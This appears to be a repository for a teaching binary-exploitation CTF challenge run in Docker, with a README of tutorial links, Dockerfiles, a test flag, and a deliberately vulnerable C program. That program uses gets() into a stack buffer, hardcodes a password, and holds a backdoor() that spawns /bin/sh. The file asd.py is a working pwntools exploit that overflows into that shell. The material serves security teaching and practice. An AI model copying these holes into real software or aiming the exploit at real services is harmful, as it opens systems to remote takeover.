├── README.md
├── challenge
    ├── Dockerfile
    ├── asd.py
    ├── flag
    ├── system_health_check
    ├── system_health_check.c
    └── ynetd
└── ctf
    └── Dockerfile


/README.md:
--------------------------------------------------------------------------------
 1 | # pwn_docker_example
 2 | Example pwnable CTF challenge hosted with docker. We used this code to run a challenge in a server setup with docker, and then use a docker container as a CTF OS to write and run the exploit.
 3 | 
 4 | - [Introduction to Docker for CTFs](https://www.youtube.com/watch?v=cPGZMt4cJ0I)
 5 | - [Solving This Pwnable CTF Challenge](https://www.youtube.com/watch?v=OqTpc_ljPYk)
 6 | 
 7 | # Related Binary Exploitation Resources:
 8 | 
 9 | - [Developing an Intuition for Binary Exploitation](https://www.youtube.com/watch?v=akCce7vSSfw)
10 | - [Working with PIE binaries](https://www.youtube.com/watch?v=pphfcaGnWSA)
11 | - [Another simple buffer overflow challenge](https://www.youtube.com/watch?v=oS2O75H57qU)
12 | 
13 | There is also a whole playlist using challenges from https://exploit.education. Later episodes explore some 64bit challenges and goes over various pitfalls:
14 | 
15 | - [Full Playlist](https://www.youtube.com/watch?v=iyAyN3GFM7A&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN)
16 | 
17 | # More Docker Videos
18 | - [How Docker Works - Intro to Namespaces](https://www.youtube.com/watch?v=-YnMr1lj4Z8)
19 | - [Deepdive Containers - Kernel Sources and nsenter](https://www.youtube.com/watch?v=sHp0Q3rvamk)


--------------------------------------------------------------------------------
/challenge/Dockerfile:
--------------------------------------------------------------------------------
 1 | # sudo docker build -t system_health_check .
 2 | # sudo docker run -d -p 1024:1024 --rm -it system_health_check
 3 | 
 4 | FROM ubuntu:19.10
 5 | 
 6 | RUN apt-get update
 7 | 
 8 | RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
 9 | RUN echo "ctf:ctf" | chpasswd
10 | 
11 | WORKDIR /home/ctf
12 | 
13 | COPY system_health_check .
14 | COPY flag .
15 | COPY ynetd .
16 | 
17 | RUN chown -R root:root /home/ctf
18 | 
19 | USER ctf
20 | EXPOSE 1024
21 | CMD ./ynetd -p 1024 ./system_health_check
22 | 


--------------------------------------------------------------------------------
/challenge/asd.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | p = remote("192.168.178.95", 1024)
 4 | print(p.recvline())
 5 | 
 6 | raw_input("attach gdb")
 7 | 
 8 | padding = "A"*cyclic_find("aclaacma")
 9 | RET = p64(0x401016)
10 | RIP = p64(0x401254)
11 | 
12 | p.sendline("sUp3r_S3cr3T_P4s5w0rD\x00"+padding+RET+RIP)
13 | 
14 | p.interactive()


--------------------------------------------------------------------------------
/challenge/flag:
--------------------------------------------------------------------------------
1 | LO{THIS_IS_TEST_FLAG}


--------------------------------------------------------------------------------
/challenge/system_health_check:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LiveOverflow/pwn_docker_example/79c63b1fa38bf83ffdf972e6f1d3dfa339522902/challenge/system_health_check


--------------------------------------------------------------------------------
/challenge/system_health_check.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <unistd.h>
 4 | #include <signal.h>
 5 | #include <string.h>
 6 | 
 7 | // gcc system_health_check.c -o system_health_check -no-pie -fno-stack-protector
 8 | 
 9 | // --------------------------------------------------- SETUP
10 | 
11 | void ignore_me_init_buffering() {
12 | 	setvbuf(stdout, NULL, _IONBF, 0);
13 | 	setvbuf(stdin, NULL, _IONBF, 0);
14 | 	setvbuf(stderr, NULL, _IONBF, 0);
15 | }
16 | 
17 | void kill_on_timeout(int sig) {
18 |   if (sig == SIGALRM) {
19 |   	printf("[!] Anti DoS Signal. Patch me out for testing.");
20 |     _exit(0);
21 |   }
22 | }
23 | 
24 | void ignore_me_init_signal() {
25 | 	signal(SIGALRM, kill_on_timeout);
26 | 	alarm(60);
27 | }
28 | 
29 | // --------------------------------------------------- MENU
30 | 
31 | void backdoor() {
32 |     system("/bin/sh");
33 | }
34 | 
35 | void remote_system_health_check() {
36 |     char read_buf[0xff];
37 |     puts("Enter password to get system details:\n");
38 |     gets(read_buf);
39 |     if(strcmp(read_buf, "sUp3r_S3cr3T_P4s5w0rD") == 0) {
40 |         puts("Access Granted\n");
41 |         system("top -b -n 1");
42 |     } else {
43 |         puts("Wrong password!\n");
44 |         _exit(0);
45 |     }
46 | }
47 | 
48 | // --------------------------------------------------- MAIN
49 | 
50 | void main(int argc, char* argv[]) {
51 | 	ignore_me_init_buffering();
52 | 	ignore_me_init_signal();
53 | 
54 |   remote_system_health_check();
55 | }
56 | 
57 | 
58 | 


--------------------------------------------------------------------------------
/challenge/ynetd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LiveOverflow/pwn_docker_example/79c63b1fa38bf83ffdf972e6f1d3dfa339522902/challenge/ynetd


--------------------------------------------------------------------------------
/ctf/Dockerfile:
--------------------------------------------------------------------------------
 1 | # docker build -t ctf:ubuntu19.10 .
 2 | # If using Windows
 3 |       # docker run --rm -v %cd%:/pwd --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d --name ctf -i ctf:ubuntu19.10
 4 | # If using Linux    
 5 |       # docker run --rm -v $PWD:/pwd --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d --name ctf -i ctf:ubuntu19.10
 6 | # docker exec -it ctf /bin/bash
 7 | 
 8 | FROM ubuntu:19.10
 9 | ENV LC_CTYPE C.UTF-8
10 | ENV DEBIAN_FRONTEND=noninteractive
11 | RUN dpkg --add-architecture i386 && \
12 | apt-get update && \
13 | apt-get install -y build-essential jq strace ltrace curl wget rubygems gcc dnsutils netcat gcc-multilib net-tools vim gdb gdb-multiarch python python3 python3-pip python3-dev libssl-dev libffi-dev wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev python-pip libc6:i386 libncurses5:i386 libstdc++6:i386 && \
14 | pip install capstone requests pwntools r2pipe && \
15 | pip3 install pwntools keystone-engine unicorn capstone ropper && \
16 | mkdir tools && cd tools && \
17 | git clone https://github.com/JonathanSalwan/ROPgadget && \
18 | git clone https://github.com/radare/radare2 && cd radare2 && sys/install.sh && \
19 | cd .. && git clone https://github.com/pwndbg/pwndbg && cd pwndbg && git checkout stable && ./setup.sh && \
20 | cd .. && git clone https://github.com/niklasb/libc-database && cd libc-database && ./get && \
21 | gem install one_gadget
22 | 


--------------------------------------------------------------------------------